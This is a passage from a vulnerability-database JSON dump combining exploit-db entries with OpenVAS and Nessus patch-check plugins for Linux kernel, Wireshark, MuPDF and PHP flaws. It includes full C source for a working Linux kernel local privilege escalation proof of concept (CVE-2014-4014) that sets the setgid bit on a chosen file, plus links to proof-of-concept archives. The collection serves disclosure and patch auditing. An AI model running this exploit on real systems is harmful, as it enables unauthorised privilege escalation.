version:\r\n1.10a\r\n\r\nFixed version:\r\nN/A\r\n\r\nCommit fix:\r\nN/A\r\n\r\nCredit:\r\nThis bug was discovered by Agostino Sarubbo of Gentoo.\r\n\r\nCVE:\r\nCVE-2017-6060\r\n\r\nReproducer:\r\nhttps://github.com/asarubbo/poc/blob/master/00147-mupdf-mujstest-stackoverflow-main\r\n\r\nTimeline:\r\n2017-02-05: bug discovered and reported to upstream\r\n2017-02-17: blog post about the issue\r\n2017-02-17: CVE assigned via cveform.mitre.org\r\n\r\nNote:\r\nThis bug was found with Address Sanitizer.\r\n\r\nPermalink:\r\nhttps://blogs.gentoo.org/ago/2017/02/17/mupdf-mujstest-stack-based-buffer-overflow-in-main-jstest_main-c\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42139.zip", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/42139/"}, {"lastseen": "2016-02-04T09:17:55", "bulletinFamily": "exploit", "description": "Wireshark - find_signature Stack-Based Out-of-Bounds Read. CVE-2015-8726. Dos exploits for multiple platform", "modified": "2015-12-16T00:00:00", "published": "2015-12-16T00:00:00", "id": "EDB-ID:39004", "href": "https://www.exploit-db.com/exploits/39004/", "type": "exploitdb", "title": "Wireshark - find_signature Stack-Based Out-of-Bounds Read", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=643\r\n\r\nThe following crash due to a stack-based out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark (\"$ ./tshark -nVxr /path/to/file\"):\r\n\r\n--- cut ---\r\n==3901==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffeadbc852d at pc 0x0000009cea23 bp 0x7ffeadbbf650 sp 0x7ffeadbbf648\r\nREAD of size 1 at 0x7ffeadbc852d thread T0\r\n #0 0x9cea22 in find_signature wireshark/wiretap/vwr.c:2214:17\r\n #1 0x9c5066 in vwr_read_s2_s3_W_rec wireshark/wiretap/vwr.c:1435:15\r\n #2 0x9bc02a in vwr_process_rec_data wireshark/wiretap/vwr.c:2336:20\r\n #3 0x9babf2 in vwr_read wireshark/wiretap/vwr.c:653:10\r\n #4 0x9d64c2 in wtap_read wireshark/wiretap/wtap.c:1314:7\r\n #5 0x535c1a in load_cap_file wireshark/tshark.c:3479:12\r\n #6 0x52c1df in main wireshark/tshark.c:2197:13\r\n\r\nAddress 0x7ffeadbc852d is located in stack of thread T0 at offset 32813 in frame\r\n #0 0x9bbbcf in vwr_process_rec_data wireshark/wiretap/vwr.c:2320\r\n\r\n This frame has 1 object(s):\r\n [32, 32800) 'rec' <== Memory access at offset 32813 overflows this variable\r\nHINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext\r\n (longjmp and C++ exceptions *are* supported)\r\nSUMMARY: AddressSanitizer: stack-buffer-overflow wireshark/wiretap/vwr.c:2214:17 in find_signature\r\nShadow bytes around the buggy address:\r\n 0x100055b71050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x100055b71060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x100055b71070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x100055b71080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x100055b71090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n=>0x100055b710a0: 00 00 00 00 f3[f3]f3 f3 f3 f3 f3 f3 f3 f3 f3 f3\r\n 0x100055b710b0: f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3\r\n 0x100055b710c0: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x100055b710d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x100055b710e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x100055b710f0: f1 f1 f1 f1 04 f2 04 f3 00 00 00 00 00 00 00 00\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==3901==ABORTING\r\n--- cut ---\r\n\r\nThe crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11791. Attached are two files which trigger the crash.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39004.zip\r\n\r\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/39004/"}, {"lastseen": "2016-02-03T19:58:02", "bulletinFamily": "exploit", "description": "Linux Kernel <= 3.13 - Local Privilege Escalation PoC (gid). CVE-2014-4014. Local exploit for linux platform", "modified": "2014-06-21T00:00:00", "published": "2014-06-21T00:00:00", "id": "EDB-ID:33824", "href": "https://www.exploit-db.com/exploits/33824/", "type": "exploitdb", "title": "Linux Kernel <= 3.13 - Local Privilege Escalation PoC gid", "sourceData": "/**\r\n * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC\r\n *\r\n * Vitaly Nikolenko\r\n * http://hashcrack.org\r\n *\r\n * Usage: ./poc [file_path]\r\n * \r\n * where file_path is the file on which you want to set the sgid bit\r\n */\r\n#define _GNU_SOURCE\r\n#include <sys/wait.h>\r\n#include <sched.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <fcntl.h>\r\n#include <limits.h>\r\n#include <string.h>\r\n#include <assert.h>\r\n\r\n#define STACK_SIZE (1024 * 1024)\r\nstatic char child_stack[STACK_SIZE];\r\n\r\nstruct args {\r\n int pipe_fd[2];\r\n char *file_path;\r\n};\r\n\r\nstatic int child(void *arg) {\r\n struct args *f_args = (struct args *)arg;\r\n char c;\r\n\r\n // close stdout\r\n close(f_args->pipe_fd[1]); \r\n\r\n assert(read(f_args->pipe_fd[0], &c, 1) == 0);\r\n\r\n // set the setgid bit\r\n chmod(f_args->file_path, S_ISGID|S_IRUSR|S_IWUSR|S_IRGRP|S_IXGRP|S_IXUSR);\r\n\r\n return 0;\r\n}\r\n\r\nint main(int argc, char *argv[]) {\r\n int fd;\r\n pid_t pid;\r\n char mapping[1024];\r\n char map_file[PATH_MAX];\r\n struct args f_args;\r\n\r\n assert(argc == 2);\r\n\r\n f_args.file_path = argv[1];\r\n // create a pipe for synching the child and parent\r\n assert(pipe(f_args.pipe_fd) != -1);\r\n\r\n pid = clone(child, child_stack + STACK_SIZE, CLONE_NEWUSER | SIGCHLD, &f_args);\r\n assert(pid != -1);\r\n\r\n // get the current uid outside the namespace\r\n snprintf(mapping, 1024, \"0 %d 1\\n\", getuid()); \r\n\r\n // update uid and gid maps in the child\r\n snprintf(map_file, PATH_MAX, \"/proc/%ld/uid_map\", (long) pid);\r\n fd = open(map_file, O_RDWR); assert(fd != -1);\r\n\r\n assert(write(fd, mapping, strlen(mapping)) == strlen(mapping));\r\n close(f_args.pipe_fd[1]);\r\n\r\n assert (waitpid(pid, NULL, 0) != -1);\r\n}\r\n", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/33824/"}], "openvas": [{"lastseen": "2018-10-02T14:33:08", "bulletinFamily": "scanner", "description": "Amazon Linux Local Security Checks", "modified": "2018-10-01T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120351", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120351", "title": "Amazon Linux Local Check: ALAS-2014-368", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: alas-2014-368.nasl 6663 2017-07-11 09:58:05Z teissa$\n#\n# Amazon Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@iki.fi>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120351\");\n script_version(\"$Revision: 11711 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:24:24 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-01 14:30:57 +0200 (Mon, 01 Oct 2018) $\");\n script_name(\"Amazon Linux Local Check: ALAS-2014-368\");\n script_tag(name:\"insight\", value:\"Multiple flaws were found in the Linux kernel. Please see the references for more information.\");\n script_tag(name:\"solution\", value:\"Run yum update kernel to update your system. You will need to reboot your system in order for the new kernel to be running.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2014-368.html\");\n script_cve_id(\"CVE-2014-4508\", \"CVE-2014-4608\", \"CVE-2014-0206\", \"CVE-2014-4014\");\n script_tag(name:\"cvss_base\", value:\"6.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.48~55.140.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"perf-debuginfo\", rpm:\"perf-debuginfo~3.10.48~55.140.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.48~55.140.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.48~55.140.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~3.10.48~55.140.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.48~55.140.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~3.10.48~55.140.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-02-21T01:22:32", "bulletinFamily": "scanner", "description": "arch/x86/kernel/entry_32.S in the Linux kernel through 3.15.1 on 32-bit x86 platforms, when syscall auditing is enabled and the sep CPU feature flag is set, allows local users to cause a denial of service (OOPS and system crash) via an invalid syscall number, as demonstrated by number 1000.\n\nArray index error in the aio_read_events_ring function in fs/aio.c in the Linux kernel through 3.15.1 allows local users to obtain sensitive information from kernel memory via a large head value.\n\nThe capabilities implementation in the Linux kernel before 3.14.8 does not properly consider that namespaces are inapplicable to inodes, which allows local users to bypass intended chmod restrictions by first creating a user namespace, as demonstrated by setting the setgid bit on a file with group ownership of root.\n\n** DISPUTED ** Multiple integer overflows in the lzo1x_decompress_safe function in lib/lzo/lzo1x_decompress_safe.c in the LZO decompressor in the Linux kernel before 3.15.2 allow context-dependent attackers to cause a denial of service (memory corruption) via a crafted Literal Run. NOTE: the author of the LZO algorithms says 'the Linux kernel is\n*not* affected; media hype.'", "modified": "2018-06-29T00:00:00", "id": "ALA_ALAS-2014-368.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=78311", "published": "2014-10-12T00:00:00", "title": "Amazon Linux AMI : kernel (ALAS-2014-368)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2014-368.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78311);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/06/29 12:00:59\");\n\n script_cve_id(\"CVE-2014-0206\", \"CVE-2014-4014\", \"CVE-2014-4508\", \"CVE-2014-4608\");\n script_xref(name:\"ALAS\", value:\"2014-368\");\n\n script_name(english:\"Amazon Linux AMI : kernel (ALAS-2014-368)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"arch/x86/kernel/entry_32.S in the Linux kernel through 3.15.1 on\n32-bit x86 platforms, when syscall auditing is enabled and the sep CPU\nfeature flag is set, allows local users to cause a denial of service\n(OOPS and system crash) via an invalid syscall number, as demonstrated\nby number 1000.\n\nArray index error in the aio_read_events_ring function in fs/aio.c in\nthe Linux kernel through 3.15.1 allows local users to obtain sensitive\ninformation from kernel memory via a large head value.\n\nThe capabilities implementation in the Linux kernel before 3.14.8 does\nnot properly consider that namespaces are inapplicable to inodes,\nwhich allows local users to bypass intended chmod restrictions by\nfirst creating a user namespace, as demonstrated by setting the setgid\nbit on a file with group ownership of root.\n\n** DISPUTED ** Multiple integer overflows in the lzo1x_decompress_safe\nfunction in lib/lzo/lzo1x_decompress_safe.c in the LZO decompressor in\nthe Linux kernel before 3.15.2 allow context-dependent attackers to\ncause a denial of service (memory corruption) via a crafted Literal\nRun. NOTE: the author of the LZO algorithms says 'the Linux kernel is\n*not* affected; media hype.'\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2014-368.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Run 'yum update kernel' to update your system. You will need to reboot\nyour system in order for the new kernel to be running.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo-common-i686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"kernel-3.10.48-55.140.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-debuginfo-3.10.48-55.140.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", cpu:\"i686\", reference:\"kernel-debuginfo-common-i686-3.10.48-55.140.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-3.10.48-55.140.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-devel-3.10.48-55.140.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-doc-3.10.48-55.140.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-headers-3.10.48-55.140.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perf-3.10.48-55.140.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perf-debuginfo-3.10.48-55.140.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-debuginfo / kernel-debuginfo-common-i686 / etc\");\n}\n", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:21:56", "bulletinFamily": "scanner", "description": "The 3.14.8 stable update contains a number of important fixes across the tree.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-05T00:00:00", "id": "FEDORA_2014-7426.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=76176", "published": "2014-06-23T00:00:00", "title": "Fedora 19 : kernel-3.14.8-100.fc19 (2014-7426)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-7426.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76176);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/12/05 20:31:22\");\n\n script_cve_id(\"CVE-2014-4014\");\n script_bugtraq_id(67988);\n script_xref(name:\"FEDORA\", value:\"2014-7426\");\n\n script_name(english:\"Fedora 19 : kernel-3.14.8-100.fc19 (2014-7426)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The 3.14.8 stable update contains a number of important fixes across\nthe tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1107966\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-June/134647.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c7710928\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"kernel-3.14.8-100.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:21:55", "bulletinFamily": "scanner", "description": "The 3.14.8 stable update contains a number of important fixes across the tree.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-05T00:00:00", "id": "FEDORA_2014-7430.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=76133", "published": "2014-06-19T00:00:00", "title": "Fedora 20 : kernel-3.14.8-200.fc20 (2014-7430)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-7430.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76133);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/12/05 20:31:22\");\n\n script_cve_id(\"CVE-2014-4014\");\n script_bugtraq_id(67988);\n script_xref(name:\"FEDORA\", value:\"2014-7430\");\n\n script_name(english:\"Fedora 20 : kernel-3.14.8-200.fc20 (2014-7430)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The 3.14.8 stable update contains a number of important fixes across\nthe tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1107966\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-June/134508.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f62ff6af\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"kernel-3.14.8-200.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:21:23", "bulletinFamily": "scanner", "description": "The patch for CVE-2012-1823 was incomplete, this update fixes the remaining bits (CVE-2012-2335, CVE-2012-2336)", "modified": "2018-06-29T00:00:00", "id": "OPENSUSE-2012-288.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=74630", "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : php5 (openSUSE-2012-288)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update 